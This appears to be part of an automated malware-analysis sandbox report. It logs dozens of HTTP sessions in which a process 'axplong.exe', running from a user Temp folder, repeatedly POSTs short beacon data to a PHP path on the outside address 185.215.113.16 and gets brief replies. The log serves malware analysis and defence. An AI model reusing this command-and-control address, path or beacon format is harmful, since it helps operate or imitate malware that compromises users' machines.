                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:25.030270100 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:25.291893005 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    44 | 192.168.2.7 | 49749 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:25.402046919 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:26.158679008 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:26.159559965 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:26.409729958 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    45 | 192.168.2.7 | 49750 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:26.526302099 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:27.286066055 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:27.286993980 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:27.545217037 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    46 | 192.168.2.7 | 49751 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:27.668454885 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:28.458842039 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:28.459644079 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:28.716157913 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    47 | 192.168.2.7 | 49752 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:28.871984005 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:29.679578066 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:29.680432081 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:29.950840950 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    48 | 192.168.2.7 | 49753 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:30.071485043 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:30.866576910 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:30.884241104 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:31.135767937 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    49 | 192.168.2.7 | 49754 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:31.266705990 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:32.044661045 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:32.047498941 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:32.297688007 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    50 | 192.168.2.7 | 49755 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:32.419059992 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:33.187058926 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    51 | 192.168.2.7 | 49756 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:33.195482969 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:33.945867062 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    52 | 192.168.2.7 | 49757 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:34.059295893 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:34.832664967 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    53 | 192.168.2.7 | 49759 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:34.981722116 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:35.764174938 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    54 | 192.168.2.7 | 49760 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:35.772686958 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:36.533183098 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    55 | 192.168.2.7 | 49761 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:36.655889034 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:37.459311962 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    56 | 192.168.2.7 | 49762 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:37.477670908 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:38.271383047 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    57 | 192.168.2.7 | 49763 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:38.499526978 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:39.239917994 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    58 | 192.168.2.7 | 49764 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:39.267868996 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:40.762068033 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:03:40.762662888 CEST | 196 | IN | HTTP/1.1 200 OK
